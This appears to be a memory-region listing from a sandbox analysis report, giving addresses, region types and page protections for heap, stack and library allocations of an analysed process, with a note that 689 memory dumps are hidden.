C00000
|
unkown
|
page readonly
|
||
|
7FFB4B150000
|
trusted library allocation
|
page read and write
|
||
|
4D5533E000
|
stack
|
page read and write
|
||
|
1E3DCF0C000
|
trusted library allocation
|
page read and write
|
||
|
177E5937000
|
heap
|
page execute and read and write
|
||
|
15E2FC5A000
|
heap
|
page read and write
|
||
|
1573000
|
heap
|
page read and write
|
||
|
1BC3B000
|
heap
|
page read and write
|
||
|
7FFB4B050000
|
trusted library allocation
|
page read and write
|
||
|
15E182CC000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B2C0000
|
trusted library allocation
|
page read and write
|
||
|
15E2FC21000
|
heap
|
page read and write
|
||
|
15E2F907000
|
heap
|
page execute and read and write
|
||
|
15E184C0000
|
trusted library allocation
|
page read and write
|
||
|
177E3D70000
|
heap
|
page read and write
|
||
|
4C5790E000
|
stack
|
page read and write
|
||
|
1E3CB016000
|
heap
|
page read and write
|
||
|
7FFB4AF5C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B51D000
|
stack
|
page read and write
|
||
|
7FFB4B100000
|
trusted library allocation
|
page read and write
|
||
|
15E27381000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B0D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B1E4000
|
trusted library allocation
|
page read and write
|
||
|
1C255000
|
stack
|
page read and write
|
||
|
1CB9C000
|
heap
|
page read and write
|
||
|
5D64E0C000
|
stack
|
page read and write
|
||
|
15E18608000
|
trusted library allocation
|
page read and write
|
||
|
4C5788E000
|
stack
|
page read and write
|
||
|
5D63C7E000
|
stack
|
page read and write
|
||
|
7FFB4B280000
|
trusted library allocation
|
page read and write
|
||
|
4D5563E000
|
stack
|
page read and write
|
||
|
177FE198000
|
heap
|
page read and write
|
||
|
4C56BB7000
|
stack
|
page read and write
|
||
|
177FE0AB000
|
heap
|
page read and write
|
||
|
7FFB4B120000
|
trusted library allocation
|
page read and write
|
||
|
106B000
|
heap
|
page read and write
|
||
|
4D54D7E000
|
stack
|
page read and write
|
||
|
7FFB4B2A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B150000
|
trusted library allocation
|
page read and write
|
||
|
15E159FC000
|
heap
|
page read and write
|
||
|
7FFB4B04A000
|
trusted library allocation
|
page read and write
|
||
|
15E182DD000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AF30000
|
trusted library allocation
|
page read and write
|
||
|
1040000
|
heap
|
page read and write
|
||
|
4C57A8E000
|
stack
|
page read and write
|
||
|
177FE420000
|
heap
|
page read and write
|
||
|
7FFB4B29C000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B2D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B2E0000
|
trusted library allocation
|
page read and write
|
||
|
15E15978000
|
heap
|
page read and write
|
||
|
1E3CB010000
|
heap
|
page read and write
|
||
|
15E2F80E000
|
heap
|
page read and write
|
||
|
7FFB4B2D0000
|
trusted library allocation
|
page read and write
|
||
|
1E3E525C000
|
heap
|
page read and write
|
||
|
1E3CD9DA000
|
trusted library allocation
|
page read and write
|
||
|
5D63EF9000
|
stack
|
page read and write
|
||
|
5D641BB000
|
stack
|
page read and write
|
||
|
7FFB4AE84000
|
trusted library allocation
|
page read and write
|
||
|
15E18CAE000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B180000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AE83000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4AE9B000
|
trusted library allocation
|
page read and write
|
||
|
14EC000
|
stack
|
page read and write
|
||
|
4C566FE000
|
stack
|
page read and write
|
||
|
1E3DCF10000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B2C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B1B0000
|
trusted library allocation
|
page read and write
|
||
|
15E27652000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B1FC000
|
trusted library allocation
|
page read and write
|
||
|
15E159F5000
|
heap
|
page read and write
|
||
|
1E3DCC51000
|
trusted library allocation
|
page read and write
|
||
|
177E3E50000
|
heap
|
page read and write
|
||
|
4C567FF000
|
stack
|
page read and write
|
||
|
15E186E7000
|
trusted library allocation
|
page read and write
|
||
|
4D5543A000
|
stack
|
page read and write
|
||
|
15E15BA0000
|
heap
|
page read and write
|
||
|
15E182D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B1E2000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B0F0000
|
trusted library allocation
|
page read and write
|
||
|
1E3CDF28000
|
trusted library allocation
|
page read and write
|
||
|
1E3CD997000
|
trusted library allocation
|
page read and write
|
||
|
4D5507E000
|
stack
|
page read and write
|
||
|
7FFB4B0B0000
|
trusted library allocation
|
page read and write
|
||
|
16CD000
|
stack
|
page read and write
|
||
|
1570000
|
heap
|
page read and write
|
||
|
7FFB4B170000
|
trusted library allocation
|
page read and write
|
||
|
1C540000
|
heap
|
page read and write
|
||
|
7FFB4B031000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B1D9000
|
trusted library allocation
|
page read and write
|
||
|
1BCBC000
|
heap
|
page read and write
|
||
|
15C0000
|
heap
|
page read and write
|
||
|
7FFB4B200000
|
trusted library allocation
|
page read and write
|
||
|
15E18AE1000
|
trusted library allocation
|
page read and write
|
||
|
7DF477300000
|
trusted library allocation
|
page execute and read and write
|
||
|
177E3F10000
|
trusted library allocation
|
page read and write
|
||
|
1E3CB055000
|
heap
|
page read and write
|
||
|
7FFB4B040000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B300000
|
trusted library allocation
|
page read and write
|
||
|
15E17F5C000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B2E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B200000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AEC4000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B2F0000
|
trusted library allocation
|
page read and write
|
||
|
15E15970000
|
heap
|
page read and write
|
||
|
7FFB4B0E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B064000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AE90000
|
trusted library allocation
|
page read and write
|
||
|
177FD9B4000
|
heap
|
page read and write
|
||
|
15E15950000
|
trusted library allocation
|
page read and write
|
||
|
177FE1E4000
|
heap
|
page read and write
|
||
|
7FFB4B190000
|
trusted library allocation
|
page read and write
|
||
|
177FE202000
|
heap
|
page read and write
|
||
|
4D555BE000
|
stack
|
page read and write
|
||
|
7FFB4AE92000
|
trusted library allocation
|
page read and write
|
||
|
4C568FE000
|
stack
|
page read and write
|
||
|
15E159B8000
|
heap
|
page read and write
|
||
|
177E3FB9000
|
heap
|
page read and write
|
||
|
7FFB4AEA0000
|
trusted library allocation
|
page read and write
|
||
|
15E182D9000
|
trusted library allocation
|
page read and write
|
||
|
177F59E1000
|
trusted library allocation
|
page read and write
|
||
|
1E3CE9F8000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B1A0000
|
trusted library allocation
|
page read and write
|
||
|
15E1913B000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AF30000
|
trusted library allocation
|
page read and write
|
||
|
4C57A0C000
|
stack
|
page read and write
|
||
|
7FFB4B2F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AE82000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B090000
|
trusted library allocation
|
page read and write
|
||
|
1046000
|
heap
|
page read and write
|
||
|
15E182D4000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B040000
|
trusted library allocation
|
page execute and read and write
|
||
|
177E3F8C000
|
heap
|
page read and write
|
||
|
13B0000
|
heap
|
page read and write
|
||
|
15E19180000
|
trusted library allocation
|
page read and write
|
||
|
15E173E8000
|
trusted library allocation
|
page read and write
|
||
|
177F5CA8000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B2B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
15E18570000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B120000
|
trusted library allocation
|
page read and write
|
||
|
1E3CC930000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B180000
|
trusted library allocation
|
page read and write
|
||
|
5D640B7000
|
stack
|
page read and write
|
||
|
7FFB4B041000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B031000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B064000
|
trusted library allocation
|
page read and write
|
||
|
177E4070000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AF86000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B040000
|
trusted library allocation
|
page execute and read and write
|
||
|
4D550F9000
|
stack
|
page read and write
|
||
|
1E3CDB80000
|
trusted library allocation
|
page read and write
|
||
|
1E3E5387000
|
heap
|
page read and write
|
||
|
177E5BD9000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B290000
|
trusted library allocation
|
page read and write
|
||
|
5D64E8D000
|
stack
|
page read and write
|
||
|
7FFB4AE93000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4AEAB000
|
trusted library allocation
|
page read and write
|
||
|
15E157B0000
|
heap
|
page read and write
|
||
|
1E3E5058000
|
heap
|
page read and write
|
||
|
7FFB4B110000
|
trusted library allocation
|
page read and write
|
||
|
177FE147000
|
heap
|
page read and write
|
||
|
1E3CE39E000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B1F0000
|
trusted library allocation
|
page read and write
|
||
|
1CB9A000
|
heap
|
page read and write
|
||
|
177E6D7B000
|
trusted library allocation
|
page read and write
|
||
|
4D5517F000
|
stack
|
page read and write
|
||
|
177E6722000
|
trusted library allocation
|
page read and write
|
||
|
1350000
|
trusted library allocation
|
page read and write
|
||
|
15E15AA0000
|
trusted library allocation
|
page read and write
|
||
|
177FE0AE000
|
heap
|
page read and write
|
||
|
1E3E531C000
|
heap
|
page read and write
|
||
|
177FDF90000
|
heap
|
page read and write
|
||
|
7FFB4B2DD000
|
trusted library allocation
|
page read and write
|
||
|
4C569FD000
|
stack
|
page read and write
|
||
|
15E2FAB0000
|
heap
|
page read and write
|
||
|
7FFB4B1F2000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B1E0000
|
trusted library allocation
|
page read and write
|
||
|
15E159C0000
|
heap
|
page read and write
|
||
|
5D6403E000
|
stack
|
page read and write
|
||
|
5D64F8C000
|
stack
|
page read and write
|
||
|
1C354000
|
stack
|
page read and write
|
||
|
15E15BB0000
|
heap
|
page read and write
|
||
|
1E3CDB9D000
|
trusted library allocation
|
page read and write
|
||
|
1E3CDD44000
|
trusted library allocation
|
page read and write
|
||
|
5D642BE000
|
stack
|
page read and write
|
||
|
4C56673000
|
stack
|
page read and write
|
||
|
15E2FC48000
|
heap
|
page read and write
|
||
|
7FFB4AFB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4D5553E000
|
stack
|
page read and write
|
||
|
177E77B1000
|
trusted library allocation
|
page read and write
|
||
|
4C56EBB000
|
stack
|
page read and write
|
||
|
177E6C06000
|
trusted library allocation
|
page read and write
|
||
|
1D488000
|
stack
|
page read and write
|
||
|
177FDE50000
|
heap
|
page read and write
|
||
|
177F59D1000
|
trusted library allocation
|
page read and write
|
||
|
1E3CE0EF000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AE9D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E3DCF12000
|
trusted library allocation
|
page read and write
|
||
|
1E3CE4AA000
|
trusted library allocation
|
page read and write
|
||
|
5D64D8F000
|
stack
|
page read and write
|
||
|
7FFB4B160000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AFA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E3E531F000
|
heap
|
page read and write
|
||
|
7FFB4B020000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B060000
|
trusted library allocation
|
page execute and read and write
|
||
|
2F80000
|
heap
|
page execute and read and write
|
||
|
300B000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B068000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B2A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B068000
|
trusted library allocation
|
page read and write
|
||
|
15E15960000
|
heap
|
page readonly
|
||
|
15E2F817000
|
heap
|
page read and write
|
||
|
7FFB4AF60000
|
trusted library allocation
|
page execute and read and write
|
||
|
15E185AF000
|
trusted library allocation
|
page read and write
|
||
|
177E6B14000
|
trusted library allocation
|
page read and write
|
||
|
177FE22A000
|
heap
|
page read and write
|
||
|
177E59A5000
|
heap
|
page read and write
|
||
|
1C51F000
|
stack
|
page read and write
|
||
|
4D5630C000
|
stack
|
page read and write
|
||
|
177FE270000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B032000
|
trusted library allocation
|
page read and write
|
||
|
5D643BC000
|
stack
|
page read and write
|
||
|
7FFB4B280000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B1D9000
|
trusted library allocation
|
page read and write
|
||
|
177FDE24000
|
heap
|
page read and write
|
||
|
1084000
|
heap
|
page read and write
|
||
|
7FFB4B070000
|
trusted library allocation
|
page execute and read and write
|
||
|
177F5CAA000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B2B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B200000
|
trusted library allocation
|
page read and write
|
||
|
7DF477320000
|
trusted library allocation
|
page execute and read and write
|
||
|
4C56C39000
|
stack
|
page read and write
|
||
|
177E3F76000
|
heap
|
page read and write
|
||
|
1E3CB00C000
|
heap
|
page read and write
|
||
|
15E17F58000
|
trusted library allocation
|
page read and write
|
||
|
15E2F900000
|
heap
|
page execute and read and write
|
||
|
1E3E503F000
|
heap
|
page read and write
|
||
|
1E3E5080000
|
heap
|
page read and write
|
||
|
15E18669000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AE90000
|
trusted library allocation
|
page read and write
|
||
|
15E1839A000
|
trusted library allocation
|
page read and write
|
||
|
4D553B6000
|
stack
|
page read and write
|
||
|
7FFB4AF66000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CE48000
|
stack
|
page read and write
|
||
|
15E2F86A000
|
heap
|
page read and write
|
||
|
4D554B8000
|
stack
|
page read and write
|
||
|
1E3CD823000
|
trusted library allocation
|
page read and write
|
||
|
177F5A22000
|
trusted library allocation
|
page read and write
|
||
|
177E694D000
|
trusted library allocation
|
page read and write
|
||
|
15E19185000
|
trusted library allocation
|
page read and write
|
||
|
15E2FB0A000
|
heap
|
page read and write
|
||
|
1E3E5120000
|
heap
|
page read and write
|
||
|
7FFB4B0B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AEFC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CB6A000
|
heap
|
page read and write
|
||
|
7FFB4B0F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AEEC000
|
trusted library allocation
|
page execute and read and write
|
||
|
15E18537000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B0A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AF4C000
|
trusted library allocation
|
page execute and read and write
|
||
|
15E18120000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AEB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AEA0000
|
trusted library allocation
|
page read and write
|
||
|
1E3CAFD0000
|
heap
|
page read and write
|
||
|
177E3F72000
|
heap
|
page read and write
|
||
|
4C57A8C000
|
stack
|
page read and write
|
||
|
7FFB4B290000
|
trusted library allocation
|
page read and write
|
||
|
1E3CE484000
|
trusted library allocation
|
page read and write
|
||
|
1E3CDB8C000
|
trusted library allocation
|
page read and write
|
||
|
4C56ABE000
|
stack
|
page read and write
|
||
|
1E3E507B000
|
heap
|
page read and write
|
||
|
1E3DCC31000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B0B0000
|
trusted library allocation
|
page read and write
|
||
|
1E3E52A7000
|
heap
|
page read and write
|
||
|
15E2FD40000
|
heap
|
page read and write
|
||
|
7FFB4B290000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B2ED000
|
trusted library allocation
|
page read and write
|
||
|
5D63DF9000
|
stack
|
page read and write
|
||
|
1AFC0000
|
trusted library allocation
|
page read and write
|
||
|
177E3F42000
|
heap
|
page read and write
|
||
|
1E3DCF1A000
|
trusted library allocation
|
page read and write
|
||
|
1E3CC9C0000
|
trusted library allocation
|
page read and write
|
||
|
15E2FC13000
|
heap
|
page read and write
|
||
|
7FFB4B210000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AE80000
|
trusted library allocation
|
page read and write
|
||
|
1BCF8000
|
heap
|
page read and write
|
||
|
7FFB4B03A000
|
trusted library allocation
|
page read and write
|
||
|
177F59B1000
|
trusted library allocation
|
page read and write
|
||
|
177E3F30000
|
heap
|
page read and write
|
||
|
1E3E5337000
|
heap
|
page read and write
|
||
|
7FFB4B110000
|
trusted library allocation
|
page read and write
|
||
|
15E159FA000
|
heap
|
page read and write
|
||
|
15E18398000
|
trusted library allocation
|
page read and write
|
||
|
4D54DFE000
|
stack
|
page read and write
|
||
|
15E2F7F8000
|
heap
|
page read and write
|
||
|
1C74B000
|
stack
|
page read and write
|
||
|
7FFB4B080000
|
trusted library allocation
|
page execute and read and write
|
||
|
177E59A0000
|
heap
|
page read and write
|
||
|
177E3EB0000
|
heap
|
page read and write
|
||
|
1E3CDF5B000
|
trusted library allocation
|
page read and write
|
||
|
177FE070000
|
heap
|
page read and write
|
||
|
7FFB4B190000
|
trusted library allocation
|
page read and write
|
||
|
DC0000
|
heap
|
page read and write
|
||
|
177FE190000
|
heap
|
page read and write
|
||
|
15E17F4A000
|
trusted library allocation
|
page read and write
|
||
|
1E3E52ED000
|
heap
|
page read and write
|
||
|
1E3E5005000
|
heap
|
page read and write
|
||
|
7FFB4B110000
|
trusted library allocation
|
page read and write
|
||
|
1E3CDB90000
|
trusted library allocation
|
page read and write
|
||
|
177E6A73000
|
trusted library allocation
|
page read and write
|
||
|
15E2766A000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B100000
|
trusted library allocation
|
page read and write
|
||
|
1E3CE50D000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AF76000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B0D0000
|
trusted library allocation
|
page read and write
|
||
|
1E3E528B000
|
heap
|
page read and write
|
||
|
15E2FC42000
|
heap
|
page read and write
|
||
|
15E15A6A000
|
heap
|
page read and write
|
||
|
15E182C4000
|
trusted library allocation
|
page read and write
|
||
|
15E15920000
|
trusted library section
|
page read and write
|
||
|
7FFB4B0A0000
|
trusted library allocation
|
page read and write
|
||
|
4D5618E000
|
stack
|
page read and write
|
||
|
1E3CCBA0000
|
heap
|
page execute and read and write
|
||
|
10B0000
|
heap
|
page read and write
|
||
|
4D54CF3000
|
stack
|
page read and write
|
||
|
7FFB4AFA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B0C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B0C0000
|
trusted library allocation
|
page read and write
|
||
|
177E5A36000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AF36000
|
trusted library allocation
|
page read and write
|
||
|
1E3CDC54000
|
trusted library allocation
|
page read and write
|
||
|
1E3CCA35000
|
heap
|
page read and write
|
||
|
15E2FC1C000
|
heap
|
page read and write
|
||
|
15E18B87000
|
trusted library allocation
|
page read and write
|
||
|
177E3EF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B1E0000
|
trusted library allocation
|
page read and write
|
||
|
15E27650000
|
trusted library allocation
|
page read and write
|
||
|
15E17DB2000
|
trusted library allocation
|
page read and write
|
||
|
1E3E5286000
|
heap
|
page read and write
|
||
|
7FFB4AFC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
15E2FCB0000
|
trusted library allocation
|
page read and write
|
||
|
15E17361000
|
trusted library allocation
|
page read and write
|
||
|
15E15BB5000
|
heap
|
page read and write
|
||
|
177FDECD000
|
heap
|
page read and write
|
||
|
15E18BC6000
|
trusted library allocation
|
page read and write
|
||
|
1E3CEA1D000
|
trusted library allocation
|
page read and write
|
||
|
1E3CB2B0000
|
heap
|
page read and write
|
||
|
177E6402000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B273000
|
trusted library allocation
|
page read and write
|
||
|
177F5CA2000
|
trusted library allocation
|
page read and write
|
||
|
130D000
|
stack
|
page read and write
|
||
|
4D5620C000
|
stack
|
page read and write
|
||
|
4C56D3E000
|
stack
|
page read and write
|
||
|
7FFB4B1F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B072000
|
trusted library allocation
|
page read and write
|
||
|
1E3CC980000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B090000
|
trusted library allocation
|
page read and write
|
||
|
177E3FB4000
|
heap
|
page read and write
|
||
|
177FE1CE000
|
heap
|
page read and write
|
||
|
177E4060000
|
heap
|
page read and write
|
||
|
7FFB4B030000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B160000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B210000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AEA3000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E3CB2E5000
|
heap
|
page read and write
|
||
|
15E27361000
|
trusted library allocation
|
page read and write
|
||
|
7DF470450000
|
trusted library allocation
|
page execute and read and write
|
||
|
15E2F8A8000
|
heap
|
page read and write
|
||
|
15E2F84B000
|
heap
|
page read and write
|
||
|
5D64F07000
|
stack
|
page read and write
|
||
|
7FFB4B180000
|
trusted library allocation
|
page read and write
|
||
|
1C94E000
|
stack
|
page read and write
|
||
|
7FFB4B1E9000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AF3C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1340000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B050000
|
trusted library allocation
|
page execute and read and write
|
||
|
5D64138000
|
stack
|
page read and write
|
||
|
1E3CB0F0000
|
heap
|
page read and write
|
||
|
1E3CDB99000
|
trusted library allocation
|
page read and write
|
||
|
1102000
|
heap
|
page read and write
|
||
|
177E3E70000
|
heap
|
page read and write
|
||
|
5D6433E000
|
stack
|
page read and write
|
||
|
7FFB4B0D0000
|
trusted library allocation
|
page read and write
|
||
|
1BCAA000
|
heap
|
page read and write
|
||
|
7FFB4B060000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4AEBD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E3CDB94000
|
trusted library allocation
|
page read and write
|
||
|
177E4100000
|
heap
|
page read and write
|
||
|
5D6500E000
|
stack
|
page read and write
|
||
|
7FFB4B080000
|
trusted library allocation
|
page read and write
|
||
|
1BC20000
|
heap
|
page read and write
|
||
|
1E3E50CF000
|
heap
|
page read and write
|
||
|
15E2FC56000
|
heap
|
page read and write
|
||
|
1E3CB01A000
|
heap
|
page read and write
|
||
|
4C56A79000
|
stack
|
page read and write
|
||
|
7FFB4AE8D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E3E5348000
|
heap
|
page read and write
|
||
|
15E2F8E0000
|
heap
|
page execute and read and write
|
||
|
7FFB4B130000
|
trusted library allocation
|
page read and write
|
||
|
177E5930000
|
heap
|
page execute and read and write
|
||
|
5D63D7E000
|
stack
|
page read and write
|
||
|
177FDEC1000
|
heap
|
page read and write
|
||
|
1AF90000
|
trusted library allocation
|
page read and write
|
There are 689 hidden memdumps, click here to show them.